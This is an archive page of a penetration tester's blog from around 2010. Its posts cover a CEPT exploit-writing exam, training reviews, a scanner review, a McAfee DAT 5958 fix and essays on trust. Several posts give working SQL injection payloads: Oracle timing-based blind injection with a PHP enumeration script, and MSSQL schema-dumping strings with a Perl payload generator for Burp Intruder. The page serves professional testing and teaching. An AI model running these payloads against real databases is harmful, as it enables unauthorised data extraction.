I finally received word that I have passed my Certified Expert Penetration Tester (CEPT) certification exam. This was the best and most enjoyable certification exam I have ever taken. There is a brief, and rather easy, multiple-choice written exam. Then the real work begins. You are given 60 days to complete and submit a practical. This practical has three sections:
  1. Write a working Windows stack overflow exploit for a piece of software they provide
  2. Write a working remote stack overflow or a format string exploit for a piece of code they provide
  3. Reverse engineer a Win32 binary to bypass its registration mechanism.
The first portion of this was surprisingly easy. The software they provide you is an actual piece of Windows software. It is old though, so it needs to be run in an appropriate environment. I don't recall if it was WinXP-compatible, but I did all mine in a Win2k VM, which provided some interesting challenges in terms of having to go searching through libraries for some calls. Also, you have to get a little tricky because the initial space you have to work with is not large enough for any meaningful shellcode in and of itself. However, this really presents little trouble if you know what you're doing. My time to completion: 8 hours

I am going to come back to #2 in a minute; instead let's talk about #3. This was by far the most exciting prospect. This is the kind of stuff that just makes you love your work. Alas, the IACRB does not put up any real challenge with their supplied target binary. Some well-placed breakpoints in SoftICE and the whole thing reads like a book. Chances are that when you make your first alteration to the binary and test it, you are going to feel really unsatisfied when you realize it's done and you've already won. They throw in no tricks or protection schemes to really trip you up. My time to completion: 2 hours

So that brings us back to the Linux exploit. I don't know who wrote the C code that they provide you, but I can tell you this: he is a bastard. They tell you that you can do either the remote buffer overflow or the format string. So, not wanting all the various headaches that format string attacks can bring, I tried the stack overflow first. The vulnerable function in this case is not your standard, simple overflowable function. The buffers are both declared at the beginning of int main, and are then passed to the vulnerable function as pointers. This means that you can't overwrite the return pointer of the 'vulnerable function'. Instead you are overflowing towards int main's return pointer. In and of itself, this is not a problem. The problem comes in the stack layout for int main. Between the vulnerable buffer and the saved return pointer is the declaration of a socket file descriptor. This file descriptor has a value of 7, or 0x00000007. Do you see the problem here? The socket itself is essentially acting as a stack canary, because the control loop won't exit until it has read specific input off the socket. If we overwrite the socket fd, the program goes to perform a recv() call on a file descriptor that does not exist, returning an error, which does NOT break the control loop. The result: we never get our terminator input read from the socket, but the program keeps going back and trying to read from a socket it can no longer find. We end up in an endless loop. There is surely some way to beat this scenario. I don't think the IACRB would make that a 'trick question', but I'll be damned if I could figure out how to bypass that bit of nastiness.

So, after lots and lots of wasted time looking at the stack, I moved on to trying the format string. I had some trouble here that was due to my own lack of familiarity with a certain mechanism they use. It is a common C mechanism, so I have little excuse; I just didn't know much about how it operated on the stack. Once I figured that out, there were a few tricks I had to use because of the nature of the program itself. There is a lot of backwards-forwards flip-flop thinking involved here, but if you can keep your data flow straight in your head you'll do fine. If not, do what I did and use a lot of sheets of scrap paper. At one point during this, I wrote down every variable and its offset just so I could visually see where everything was on the stack at a glance. This is very important. You are going to want to become intimately aware of where everything is on the stack and how it got there; it will make your life easier. The final challenge was then taking the exploit and pulling it together into a single cohesive exploit with no manual processes. This was of course a job for Perl, and my favourite language performed admirably with just a tiny bit of help from C (I decided to quickly write a statically compiled binary to do one little piece for me. I didn't know how to do that part in Perl, and so I just fudged it a little bit with C, sue me). My time to completion: ~3 weeks!

All things considered, I found the CEPT Practical Exam to be one of the most worthwhile things I've done. It is by far the best, most relevant, and most rewarding certification I've ever gone after.

Finally, I have to thank Infosec Institute. I had some not-so-great things to say about the first half of their 2-week course. However, the second half of the course was very good. The instructor in the online videos seemed very competent, and was good at getting ideas across. The labs were, for the most part, well done. It did a fairly good job of preparing me for the CEPT cert, but certainly didn't give you all the answers in advance. Also, the staff at Infosec Institute are great people and very helpful. There were a few complications that arose during the course of ordering, receiving and doing the training. Minh Nguyen and Steve Drabik over there could not have been more helpful in getting these issues sorted out. They were also very patient with the man who kept annoying them every other week ;) . I am already looking at their Expert Penetration Testing: Writing Windows Exploits and their Reverse Engineering classes for the future, although I am worried about repeating material, especially since Infosec Institute does come with a rather high price tag.

My advice to anyone in the industry who is interested in developing these skills more would be to take the "Advanced Ethical Hacking" course and the CEPT cert. If nothing else, it will be fun.

Tuesday, 21 September 2010

Projects Worthy of Praise: Hackers Unite

It has been a while since I last posted. I come to bring you news of two different projects. I am very excited about both of these. The first one is one I am actually involved in directly: a Hackerspace in Charlotte, North Carolina. This idea sort of got kicked off by one of my coworkers, who started investigating it after visiting Nullspace Labs in LA. He asked if I was interested, and soon after we began investigating potential spaces.

We had our first meetup last week, and to our surprise 25 people showed up. The reaction was astoundingly positive. We have a good assortment of software and hardware hackers. We have developers, pentesters, robotics people etc. Everyone there seemed genuinely committed to the idea. Our next meeting is tonight, although I am going to have to miss this one. So if you live in the greater Charlotte area and are interested in participating, please come check us out.

The other project I wanted to mention is being done by Schuyler Towne. He is attempting to start his own lockpick business, and has used Kickstarter to try and raise initial funds. He had a goal of about $6,000, and has so far raised over $68,000. Depending on your donation level you will receive some absolutely fabulous prizes, including custom lockpicks, practice locks, templates, and more. If you are at all interested in the sport or science of picking locks, do yourself a favour and get on board with this. It is an amazing deal, and people like this deserve community support anyways. There are only 71 hours left to get on board as a backer!

Monday, 26 July 2010

Infosec Institute Advanced Ethical Hacking

A while ago I made a post about Infosec Institute's 10 Day Penetration Testing Course. I had some not-so-great things to say about the first half of the course. I think, in retrospect, the first week would be good for someone just starting out in the field to get their feet wet. There are some things I definitely think I would change, to bring it more in line with that concept, but it's hard for me to judge since I was already outside of that target audience. I have finally had the time to delve into the second week of the training course. This portion of the course focuses on the real meat and potatoes of penetration testing and exploiting. There is still some tool-centric material at the beginning, but the course jumps pretty quickly into the good stuff. It starts covering program memory structure, and how buffer overflows really work. Pretty soon you find yourself writing basic shellcode, and doing memory analysis to perform true exploits.

There are ties back to tools, but mostly in how they can make your life easier. Everything this part of the course covers is done manually before they show you how to use a tool. In my opinion, this is exactly what they should be doing. I do not have an assembly background, so some of this is valuable information I have been missing so far. From buffer overflows it moves on to format strings and heap overflows. There are sections on fuzzing, fault injection and more that I have not gotten to yet. I hope to be finishing up the course in the next few days.

There are some benefits to the online version of this course, such as being able to set your own pace. That being said, I think this particular course would be worth paying the extra money for the classroom experience. These are much more complicated topics than the first week, and if you don't already have experience in assembly and memory structure you may find yourself wanting to ask questions that you will have to answer all on your own. There is nothing wrong with this, of course, but I personally prefer active discussion to simply reading things online.

All in all, my impression of the second half of this training is very different from the first. Anyone who has experience with penetration testing, but wants to delve into the real heart of the subject should take a course like this.

Sunday, 25 July 2010

Moving on and Moving Up

The inevitable has happened. I am leaving my current job, and moving on to a new company. I am very excited about this new opportunity. The company I am going to work for seems like a great place to work. However, this will be the first time my family has moved to a location where we don't know anybody. We will have no friends and no family there. This is the part of this field that isn't so great. Jobs tend to crop up in very specific places, and you have to be ready to pick up and move in order to not lose a great opportunity. It was a hard decision to sacrifice all the personal reasons to stay in favour of all the professional reasons to move. We have family and friends here that we love very much. We like this area after being here only two years. My children will no longer be able to see their grandparents so often. However, I will be moving to a larger, more mature company, in a great area. The team I will be working with is full of very bright people who take this work very seriously. Even more importantly, the members of my new team know lots of things I don't. I will be working to learn a lot from them, and that is something I am eager to start doing.

Robert Khoo over at Penny Arcade said something in one of their TV episodes that has stuck with me since. He told a potential employee: "To be successful at something, to be like the best of breed at something, means you make sacrifices. I would say nine times out of ten, that means your social life, and that is how you get amazing at something." I think that this is extremely true. Nobody ever got to be the best at something by putting in the same amount of effort as everyone else. You get to be the best by putting in more effort than everyone else, and working as hard as you possibly can. I don't know if I can ever be the best at what I do, but I won't stop trying until I am. I have a long way to go before I can be the next RSnake, lcamtuf, or Tavis Ormandy. The best part of being in this field is that those very people I wish to be better than will help me along the way. It may not be in a big way, but each of those three people has helped me grow already. Each of them has even taken the time to reply to emails and blog posts. These are people who will honestly share ideas and knowledge. That, more than anything else, is what makes this field great. So look out guys, one day soon you may be reading a white paper with my name on it. In the meantime I just want to say thank you to all of you, as well as Mark Russinovich over at Microsoft, for taking time out of busy lives to answer a few stupid questions from somebody you've never heard of...yet.

Saturday, 26 June 2010

Tavis Ormandy's Full Disclosure: Just the facts, ma'am

Everybody has been talking about Tavis Ormandy's disclosure of a Windows Help Centre vulnerability. There has been very heated debate going around; in some cases the word 'debate' is a little generous. There has been a lot of name calling, mud slinging, and general ad hominem nonsense. People are trashing Tavis, Microsoft, and even Robert Hansen now. It's gotten a little out of hand. What I have noticed is a lack of real substantiated facts in these arguments. To that end, I have made an effort to contact both involved parties, Tavis Ormandy and the MSRC. I am hoping that they will be willing to respond with some of the facts surrounding this occurrence, and maybe we'll hear a little bit of tempered truth instead of everyone's emotionally charged bickering. Of course, the chances that either Tavis or the MSRC will be bothered to respond to me are probably not great, but here's hoping.

UPDATE: I have heard back from Mr. Ormandy. He was very polite, but has stated that he would prefer to let the issue rest rather than answer any more questions. Since I am unable to present his side of the argument, even if I were to hear back from Microsoft, I would feel it impossible to present an unbiased view here. Therefore I shall just let it drop. Perhaps that is really what we all need to do. If you think he was right, then silently cheer him on; if you think he was wrong, admit that maybe he made a mistake, and move on.

Wednesday, 23 June 2010

Oracle Blind SQL Injection: Timing-Based Attack Using Heavy Queries

This is a neat little trick my mate and I just learned about while testing an Oracle-based application with a blind SQL Injection vector in it. It is not new by any means, nor did we discover it. Check out the Defcon presentation that gave us the starting point, here. Conventional wisdom would have you believe that you cannot do timing-based blind SQLi against Oracle, since there's no WAITFOR DELAY. What we have done is unioned in a query that, when true, initiates a secondary 'heavy' query to the database. What we mean by heavy is that it tries to pull a lot of data, purposely slowing down the response time. Let's take a look at our example:

NULL UNION ALL SELECT SOME_FIELD_1 AS COL1, SOME_FIELD_2 AS COL2,((CASE WHEN EXISTS(SELECT SOME_FIELD_3 FROM SOME_TABLE_2 WHERE 0>(select count(*) from all_users t1, all_users t2,all_users t3,all_users t4) AND 1=1) THEN 'own' ELSE 'pwn' END)) as COL3 FROM SOME_TABLE_1,SOME_TABLE_2 ,DUAL WHERE --
This shows us a true example, which should trigger based on the 1=1. For this query we will see a noticeable delay over the same query with 1=1 replaced by 1=2. That tells us that a true condition will take much longer to reply. So all we have to do is replace the simple 1=1/1=2 structure with our own test parameters. This is where you get into inserting your counts, lengths, and ascii(substr portions, and slowly and methodically enumerate out every last bit of data in the system. This is a great technique to use when other blind injection techniques fail.
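To make the enumeration concrete, here's a rough sketch of scripting the timing check (PHP; the URL, parameter, and two-second threshold are placeholder assumptions for whatever your real vector looks like):
----------------------
<?php
### Hypothetical injectable endpoint -- substitute your real vector.
$base = 'http://target.example/app?id=';

### Time a request with the given condition spliced into the heavy query.
function timeCondition($base, $cond) {
    ### Truncated for readability; use the full UNION/heavy query from
    ### above with $cond in place of the 1=1.
    $payload = "NULL UNION ALL SELECT ... AND $cond ...";
    $start = microtime(true);
    @file_get_contents($base . urlencode($payload));
    return microtime(true) - $start;
}

$fast = timeCondition($base, '1=2');   // baseline: false, no heavy query runs

### Example question: is the first character of the first username > 'm'?
$t = timeCondition($base, "ascii(substr((select username from all_users where rownum=1),1,1))>109");
echo ($t > $fast + 2) ? "TRUE\n" : "FALSE\n";
----------------------
From there it's just a loop: binary search each character position until the whole value falls out.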

Monday, 7 June 2010

SQL Injection Tip of the Day: Table and Column enumeration in a single row

I will be getting around to putting together a comprehensive cheat sheet for SQL injection. In the meantime, I figured I would release bits and pieces that I have found particularly useful. Today I want to talk about getting database schema metadata from Microsoft SQL Server 2005 and 2008 (the technique may be slightly different for 2000).

This assumes you already have a SQL injection vector that allows stacked (serialised) queries and union queries, and that the DB user has create rights, although it can be modified to use update/insert into existing tables instead. So let's say you have found a SQL injection vulnerability, but it will only return one row of results. That makes it an exceptionally arduous task to enumerate all the tables and their columns one at a time. You can concatenate rows very easily, but you can't use concatenation against columns. This is where arrays come in to save the day. The first step is to inject a string like this:

';CREATE TABLE CT1 (tablenames VARCHAR(8000));DECLARE @tablens varchar(7999); SELECT @tablens=COALESCE(@tablens+';' , '') + name from dbo.sysobjects where xtype='U'; INSERT INTO CT1(tablenames) Select @tablens;--

Remember to encode as needed. This creates a new table called CT1 with a max-size varchar as its only column. It then declares a varchar variable called @tablens and, via COALESCE, concatenates into it the entire name column from dbo.sysobjects where the object is a user table. Finally it inserts the variable, semicolon-delimited, into our newly created table.

Then we just do something silly like:
' UNION Select tablenames,@@rowcount,@@servername,1,2,3,4,5 from CT1;DELETE from CT1;--

This of course returns the results and clears the table out behind us. We should now have all of the table names in this database. From there we use the same attack vector, just slightly tweaked:


';DECLARE @tablens varchar(7999); SELECT @tablens=COALESCE(@tablens+',' , '') + name from syscolumns where id=object_id('Table1'); INSERT INTO CT1(tablenames) Select @tablens;--
and
' UNION Select tablenames,@@rowcount,@@servername,1,2,3,4,5 from CT1;DELETE from CT1;--

Now what I did, after making sure it worked, was to create a quick Perl script. It took the list of table names, generated the above attack string for each table, and wrote them all to a text file. I then loaded this file into Burp Intruder as a custom payload list and let it run. Burp enumerated almost all of the tables in a couple of minutes (this db had over 100 tables). Then it's just a matter of dumping all the results somewhere and poring over them. Using this method, you can go from a proven SQL injection vector to a map of the whole database in a very short amount of time.
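For anyone who wants to reproduce that generator, a rough sketch follows. The input file of table names (one per line, as dumped out of CT1) and the output file name are my own placeholders, not the exact script I used; remember to let Burp handle the URL encoding of the payloads.

#!/usr/bin/perl -w
use strict;

# Reads table names, one per line, and emits one column-enumeration attack
# string per table, suitable as a Burp Intruder custom payload list.
open(my $in,  '<', 'tablenames.txt') or die "can't read tablenames.txt: $!";
open(my $out, '>', 'payloads.txt')   or die "can't write payloads.txt: $!";

while (my $table = <$in>) {
    chomp $table;
    next unless length $table;
    print $out "';DECLARE \@tablens varchar(7999); "
             . "SELECT \@tablens=COALESCE(\@tablens+',' , '') + name "
             . "from syscolumns where id=object_id('$table'); "
             . "INSERT INTO CT1(tablenames) Select \@tablens;--\n";
}
close $in;
close $out;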

And as ever, this showcases why Burpsuite Pro is a tester's best tool. How I ever worked without it is a mystery.

Thursday, 27 May 2010

Training courses - Nerd steroids

A few years ago, when I was trying to break free of the more mundane trappings of IT, I decided to take some certifications. I began with CompTIA and took my Network+ and Security+ exams. Imagine my surprise when these certification exams took me no more than 15 minutes apiece to ace. They were so easy it became embarrassing to tell people that I had bothered to take them. I have considered going for my CCNA and CCSP many times but never gotten around to it. I am now in the process of taking a 10-day course from infosecinstitute. This course is actually two courses jammed together into a single bootcamp. I am doing the online version of the course, unable to get my company to buy in for the additional cost of actually attending a physical class. These courses are centered around the CEH, CPT, and CEPT certifications. I am not very far into the first week of material and I am starting to get that sinking feeling again.

I don't want to bad-mouth infosecinstitute and its training...at least not yet. However, the entire first day was essentially an introduction to using VMware and Linux. They do this because they want to cater to people who might not have experience in those areas. My question is: what are such people doing taking courses on pentesting? If you don't know how to set up a VM, or how to kill a process in Linux, you've got a long way to go before you can be a pentester, and it is going to take a lot longer than two weeks. This is where the steroid analogy comes in. People seem to approach these classes as a quick fix, rather like steroids: "If I take this class, I will learn to be a 1337 h4x0r."

DarkNet has a post about training courses right now too. In it he talks about how the CEH is pathetic (I am inclined to agree so far) and then covers a few other courses/certs. Frankly speaking, these look much the same as every other one I've looked at. They seem tantalizing at first, then you realize it's the same recap bullshit and you learn nothing new.

Let's give up on the steroids, guys, and start thinking about some workout regimens. I want to see training courses out there that say outright, "If you don't know what the different kinds of vulnerabilities are, or if you don't know how to find SQL injection, XSS, etc., don't take this class." Let's have some classes that start with, "So you know how to find some vulnerabilities; let's talk about advanced techniques, and things you never thought to try before." Let's talk about how you maximize your extraction from a SQL injection, or what works in Oracle versus MSSQL, or U2, or Sybase. Let's talk about some advanced encoding tricks, and how to pack JavaScript to get around filters. Let's talk about writing shellcode to exploit a buffer overflow.

I am tired of having to rehash the same crap over and over again. Then I read what RSnake or someone else is up to, and I stop and think: "Hrm, what are they doing differently than me? What do they do better than me? Why?" I want to see training courses that answer those questions. I want something that says, "Okay, you're a pentester. Now let me show you how the big boys do it."

Anyways, that is my rant for the day. Stay tuned, as I will be working on putting together a bit of a SQL injection cheat sheet in the coming weeks. I hope to have something comparable to RSnake's XSS cheat sheet and a lot better than the other ones I've seen.

Monday, 24 May 2010

Pakistan and the cyber-jihad?

Wow, I have been out of touch with current events and have been playing catch-up a little. I just read about Pakistan's own ISP PieNet taking down YouTube. Apparently there has been a big battle of wills between the Pakistani government and sites like YouTube, Facebook, and our own beloved blogger.com. The Pakistani government mandated that these sites be blocked, so PieNet decided to send out BGP announcements for YouTube's address space, redirecting the traffic to themselves....brilliant. Aside from the stupidity of this approach (they slammed themselves with all of YouTube's traffic and then got cut off by their upstream provider), this is pretty amazing. I am not aware of anything quite like this incident happening before.

An actual legitimate ISP has blatantly and purposefully launched a denial of service attack on one of the biggest sites on the Internet, over views on censorship. They are basically committing an act of cyberwarfare in the closest sense that the term can be applied. Cyberwarfare, in my opinion, can't really be a part of true physical conflict; it is exactly this kind of scenario, a war of ideas. Pakistan's policy has become one of attacking the largest and easiest providers of free expression to the masses. A lot of these countries have always censored heavily, and done horrible things to keep the truth hidden, but this is the first time I can think of where they have done it on a global scale. What happens if we see this behaviour continue? What are the large-scale implications for the Internet as a whole? There's some heavy stuff going on here. I will need more time to digest it all. In the meantime, what does everybody else think?

Stored Procedures do not necessarily prevent SQL Injection

It seems that a lot of people think that just because an application uses stored procedures, its queries must be safe. This is absolutely false. Stored procedures do not inherently add security; they can be put together as poorly as any dynamically built query. I saw a perfect example of this the other day. An application took inputs and passed them to a stored procedure, which then built a SQL query by concatenating the inputs with predefined query strings and called sp_executesql to execute the dynamic query. The developer had obviously heard that stored procedures were safer than dynamic queries, so they went and made an SP, but their SP built a dynamic query anyway. All they succeeded in doing was pushing the problem back into the database layer instead of the app itself. A quick sketch of the pattern follows.
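To illustrate from the calling side (the procedure name, columns, and connection details here are entirely made up, not the app I tested), notice that the application can parameterize its call to the stored procedure perfectly and still be injectable, because the injection happens inside the SP:

#!/usr/bin/perl -w
use strict;
use DBI;

# Hypothetical DSN and credentials.
my $dbh = DBI->connect('DBI:ODBC:SomeApp', 'appuser', 'apppass')
    or die $DBI::errstr;

# The call itself is properly parameterized...
my $sth = $dbh->prepare('EXEC dbo.SearchCustomers ?');

# ...but if dbo.SearchCustomers internally builds something like
#     SET @sql = 'SELECT * FROM Customers WHERE name = ''' + @name + '''';
#     EXEC sp_executesql @sql;
# then this input still breaks out of the query, inside the database layer.
$sth->execute("x' UNION SELECT name, pass, NULL FROM Users--");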

So testers and developers, please do not assume that an SP means safe. You still have to properly parameterize your queries and validate input and output. Security and shortcuts do not go together. If you think you may have vulnerable SPs like this, try running a query such as SELECT object_name(id) FROM syscomments WHERE UPPER(text) LIKE '%SP_EXECUTESQL%' OR UPPER(text) LIKE '%EXECUTE%' OR UPPER(text) LIKE '%EXEC%' to see where these vulnerabilities might be hiding.
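If you want to run that across a big database without eyeballing result grids, a quick DBI wrapper works; this is just a sketch with placeholder connection details. Two caveats: the '%EXEC%' pattern is a substring match, so it already covers EXECUTE and sp_executesql on its own, and syscomments splits long procedure bodies across multiple rows, so treat hits as candidates for manual review rather than confirmed findings.

#!/usr/bin/perl -w
use strict;
use DBI;

# Placeholder DSN and credentials.
my $dbh = DBI->connect('DBI:ODBC:SomeApp', 'appuser', 'apppass')
    or die $DBI::errstr;

# '%EXEC%' subsumes '%EXECUTE%' and '%SP_EXECUTESQL%' as a substring match.
my $sth = $dbh->prepare(q{
    SELECT DISTINCT object_name(id)
    FROM syscomments
    WHERE UPPER(text) LIKE '%EXEC%'
});
$sth->execute;
while (my ($sp) = $sth->fetchrow_array) {
    print "candidate for review: $sp\n";
}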

Wednesday, 19 May 2010

Return postage for Mr Zalewski

All due respect to Michal Zalewski. He is, after all, a very smart man; much smarter than me, I'd wager. That being said, I disagree with some of his recent Zero Day Threat Post blog, Postcards from the anti-virus world. Go ahead and read it, if you haven't already. Go ahead, I'll wait for you.....okay, done? The most glaring problem is the logic fail around the first bullet points. He says that most users are not keeping their anti-virus up to date. He then claims this works to the average AV user's advantage, because malware writers don't bother to write AV evasion. First of all, this seems a bit specious to me, but let's continue on to the real problem here. In the first sub-point of the second item, he says that malware authors push their malware out so fast and so widespread that there will be signature updates for it quickly, and that this is good.

So excuse me, Mr Zalewski: people don't update their AV with the latest signatures, but it's okay because new signatures are pushed out really fast? These two points of logic can in fact work together, as strange as it seems. The problem is that, in this scenario, the user base that is all good has been marginalized to a fraction of the total user base. So what is really being said here is not that AV blacklisting methodology works really well, but rather that the fundamental failure of this approach for the majority constitutes a success for a minority of users. So if you are a home user who keeps his antivirus up to date, you are better off than a home user who doesn't, or than a corporation that does or does not.

Now let's talk about the second failure of this thinking. Mr Zalewski is thinking in the immediate. Even if the current trend continues for N iterative cycles, the AV users do not win. The reason for this is simple: blacklist methodology is not sustainable once N has grown to a large enough number in relation to the resource capacity of the machine running it. Antivirus has always been a resource hog, and has only gotten worse with time. The reason for this is the escalation factor. The 'bad guys' keep coming up with new malware, new techniques, new exploits, etc. So the AV firms come out with new signatures, new heuristics, and new scan engines. With every cycle, the product becomes less manageable from a resource perspective. I have had consultants tell me that 'most major companies' do not run AV products on production servers, because it is too resource-intensive.

There is also the manageability of the program itself. Remember that AV is code just like any other program, not some magical box. It's prone to bugs big and small, like any other code. The more you mess with the code, the greater the chance of introducing NEW bugs into it; as the complexity increases, so do the odds of deviation from expected behaviour. I'm sure that smarter people than me have expressed this mathematically, but I don't know where such a formula resides. So as the N described above continues to increase, so do the odds that we will see something like the McAfee DAT 5958 bug. This factor alone takes a bite out of the security of an AV solution, because security will constantly be fighting operational needs for resources, and every time we have a bug like DAT 5958 or the Symantec Y2K10 bug, the rest of IT hates AV a little more.

Now let's get back to the bit about most malware authors not using AV evasion. Now, I am not Dancho Danchev or any other malware researcher; remember, I'm just some schmuck penetration tester. That being said, I find it hard to believe this statement is entirely true. What I would be more inclined to believe is that there is now an abundance of skiddies out there using malware 'kits' to assemble tons of variant malware and distribute it. These people, of course, have no idea how to create evasion techniques, so they don't bother; they just cherry-pick. I would hazard a guess that a lot of the people really spending time on writing their malicious code spend time on at least some basic AV evasion.

Whether that's true or not, evasion is somewhat unnecessary. Mr Zalewski hints at this as well in his article. He says they don't bother because people don't update their anti-virus, so they don't worry about signature updates. This is just a demonstration of the utter failure of blacklist methodology. The malware authors don't need to write evasion techniques: if a signature doesn't exist, and the heuristics won't catch it, what's the point? They can release their code into the wild now, then create a new variant when the AV companies get a sig out. They can play this game for quite a while. Tools like VirusTotal even give them a running scorecard of how they are doing against all the major players. Relying on signatures leaves holes you could drive trucks through. Those trucks, by the way, happen to be hauling your private data away to China and Russia.

Now please don't get me wrong here. I am not trying to call foul on the AV companies, at least not in any particular fashion. The thing is, if you are an MNC that got hit by a worm that exfiltrated trade secrets, and then F-Secure releases a signature a little later, that doesn't help much. It's rather like someone breaking into your house and stealing all of your stuff: the cops catch the crook, but may not get your stuff back. You don't blame the cop, but you do wish they had caught the guy while he was trying to break in, not after the fact.

As always, discussion and opinions are welcome here.

Friday, 23 April 2010

NetSparker Community Edition Review

For those of you who do not follow DarkNET, it is a well-run blog where they add their perspective on security news and events. They also post a never-ending stream of new tools and updates; they are a great resource for keeping up to date on the latest toys and tools. They have come through for me once again by introducing me to Netsparker Community Edition. The last fire-and-forget web scanner I was enticed to check out in this manner was a horrible flop. It was called Acunetix, perhaps you've heard of it? If you haven't, don't bother, it's rubbish.

So as you can imagine, I was not expecting great things from Netsparker. However, as I was downloading it I noticed that RSnake had also posted about it. Like many people in my field, I tend to have an ego, but when RSnake speaks, I listen. So I installed the community edition and gave it a few quick run-throughs. As expected, many of the best features are turned off in the freebie version, but that's okay. They left enough good stuff in there to whet my appetite (good job, marketing guys). So here are the things I noticed right off the bat:

  1. The user interface is very simple and straightforward. This is usually my first indication of a problem. In my experience, good products in this space tend to have absolutely wretched interfaces; they are tormented things that will try to bend your mind to their will and subjugate you completely. The interface here is so simple most anyone could walk through setting up a scan.
  2. The user interface makes sense. Acunetix is a perfect example of a simplistic but terrible user interface: very simple, but anything but straightforward. Trying to make it do some of the things you'd like it to do is not an easy task. Netsparker does not suffer these issues. It presents you with almost everything you could possibly need and, even more importantly, nothing you don't.
  3. The sucker is FAST. I typically use IBM's Rational AppScan product. While AppScan is a good product, fast is never an adjective I would use to describe it. Netsparker is fast. Part of why it is so fast is that the test profile is so limited in the community edition, so let's just look at the crawler. A 964-URL site took AppScan just over an hour to crawl; NetSparker did it in 15 minutes, then ran all of its tests in another 20-30 minutes. We may see these speeds drop dramatically with the full version, due to the expanded test profile.
  4. SQLi right away. One of the apps I tested it on had SQL injection right on the login page. AppScan had failed to detect it, but manual testing revealed it inside 10 minutes. Netsparker caught it immediately. While this is far from a comprehensive look at its detection rates, I say bravo to Netsparker.
  5. Thoroughness. This is hard to gauge because it is the limited version. It FEELS like it is not very thorough. Part of this is psychological, because it runs so fast; part of it is that it doesn't find some things because it is the 'community edition'. I can't shake the feeling that it is not being thorough, but I would really have to test the full version to make any honest assessment of this.
  6. No false positives, sorta. I performed several test scenarios, and it did not really generate false positives. The ambiguous language here is due to what I think is a very neat feature: on one of the test sites I saw a distinction in the results between 'we know there is cross-site scripting' and 'we think there might be'. I appreciate that it is extremely difficult to eliminate false positives, and I think this approach is great.
  7. Testing framework. I have talked about this before, and I will talk about it again: we need to see testing harnesses, not just scanners. Once you are done with a scan in Netsparker, it has tools you can use within the app to attempt to exploit the vulnerabilities. If you find a possible SQLi, there is an actual injection tool built into the scanner to let you try to exploit it. It has similar tools for LFI and command injection. This, to my mind, represents the absolute right direction for these types of products to be heading in.
  8. Price tag. The community edition is free but limited. They then have two unlocked versions, Standard and Enterprise, the key difference being the number of sites licensed for. I'm not sure if this means you predefine what sites you are licensed for or what. However, the unlimited Enterprise Edition comes with a price tag of only $3000, which is extremely reasonable in my opinion. It also makes the product worthwhile even as a second scanner. I am considering recommending we purchase an Enterprise license so that we can have two scanners and see if we catch anything with one that we don't with the other.
So let me summarize briefly. The Community Edition of Netsparker shows some very significant promise and would seem to indicate a well-thought-out, well-developed product. However, for professional assessments I would definitely recommend you not rely on the Community Edition. Without having tested the Enterprise Edition, I won't recommend it out of hand, but at a price tag of only $3000, it seems like a good idea.

Netsparker Community Edition is created by Mavituna Security and can be downloaded here.

Wednesday, 21 April 2010

McAfee 5958 DAT issue fix update

Okay, so in my previous post I recommended copying the svchost.exe binary from the servicepackfiles\i386 directory. While in most cases this should work fine, there is still a possibility of version issues doing this. The better solution (although somewhat more tedious) would be to load the extra.dat file, then go into the VirusScan console, unlock it, and release svchost.exe from the quarantine. This should give you back the exact svchost binary that was removed. I don't know if there's any way to script releasing from quarantine, which makes this somewhat less favourable a solution from a wide-scale deployment standpoint. However, it does guarantee that you'll get the EXACT same binary back that you lost. I've heard that Ford in particular is having an issue due to a special svchost binary they were using in their image; because the version didn't match when they did the fix, it supposedly prevented the OS from booting properly. For most people, either way will work fine, I just have to advise caution. I don't want somebody getting mad at me later because the fix I posted 'didn't work'.

This is another reason why I don't think it'd be a good idea for me to post the binary we created for the fix. It is using the specific svchost binary from our standard image and may not be right for everyone. Thanks to everyone who's been commenting/discussing here. I like seeing people helping each other out.

UPDATE: I thought this went without saying, but I'll make sure I mention it anyway. Please make sure to also add the extra.dat to your ePO repositories. At this point, with 5959 out, it is probably a moot point, but better safe than sorry.

McAfee DAT 5958 Fix

As many people are already aware, McAfee released DAT 5958 today. This DAT contained a fault which caused issues on hosts running Windows XP SP3. The fault led to a false detection of the W32/Wecorl.A worm (an MS08-067-based worm), which resulted in McAfee nuking svchost.exe and killing all win32 services on the machine. That in turn causes a laundry list of problems. The way to fix impacted machines is simple:

1. Boot the machine into safe mode
2. Take the extra.dat file mcafee is providing and load it into c:\program files\common files\mcafee\engine
3. Copy svchost.exe from c:\windows\servicepackfiles\i386\svchost.exe to c:\windows\system32\svchost.exe and c:\windows\system32\dllcache\svchost.exe
4. Reboot

This should remove the faulty signature and replace the damaged svchost from the service pack files. The fix has been tested and works within our company. We have rolled it into a quick exe package for ease of use.
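For what it's worth, steps 2 through 4 script easily. Here is an illustrative sketch of the sort of thing we wrapped into our package, assuming a default XP install layout; the location you stage extra.dat from is a placeholder, and booting into safe mode first is still on you.

#!/usr/bin/perl -w
use strict;
use File::Copy;

my $engine = 'C:/Program Files/Common Files/McAfee/Engine';
my $spf    = 'C:/WINDOWS/ServicePackFiles/i386/svchost.exe';

# Step 2: drop the extra.dat into the engine directory (staged alongside this script).
copy('extra.dat', "$engine/extra.dat")
    or die "extra.dat copy failed: $!";

# Step 3: restore svchost.exe from the service pack files.
copy($spf, 'C:/WINDOWS/system32/svchost.exe')
    or die "svchost restore failed: $!";
copy($spf, 'C:/WINDOWS/system32/dllcache/svchost.exe')
    or die "dllcache restore failed: $!";

# Step 4: reboot normally afterwards.
print "Done - reboot the machine.\n";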

Tuesday, 9 March 2010

Who can you trust?

So by now, everybody has heard about the whole Energizer DUO affair. Couple that with the news that Vodafone shipped out some Android phones with Windows malware loaded on them. If you haven't heard about this bit yet, I recommend reading here and here. The ZDNet post is especially nice because it includes links to posts about other incidents just like this. You just have to ignore the Linux vs Windows flamewar, which I'm sorry to say I let myself get dragged into the middle of. I think it's a shame that the post devolved into that when there's a serious security concern brewing here. It has nothing to do with OSes or even software. It has to do with trust.

We spend a lot of time talking about trust in the security world. "Don't download software from an untrusted source", "don't open emails from people you don't trust", "don't plug untrusted USB devices into your computer." Then we get very condescending when people fail to obey these simple tenets of trust. What do we do when the trust betrays us, though? These two most recent examples show cases where the users had every right to trust the infection vector. They downloaded software directly from Energizer's site; why wouldn't it be safe? I just bought this phone, it's brand new; how could it possibly have malware on it? The phone example is exactly as if you went to a store like Staples, bought a thumb drive, opened that horrid plastic bubble packaging, inserted it in your computer, and then your antivirus started setting off alarms like a 1940s air raid siren. The device was brand new, had not been tampered with in the store as far as you could tell, and came from a trusted source.

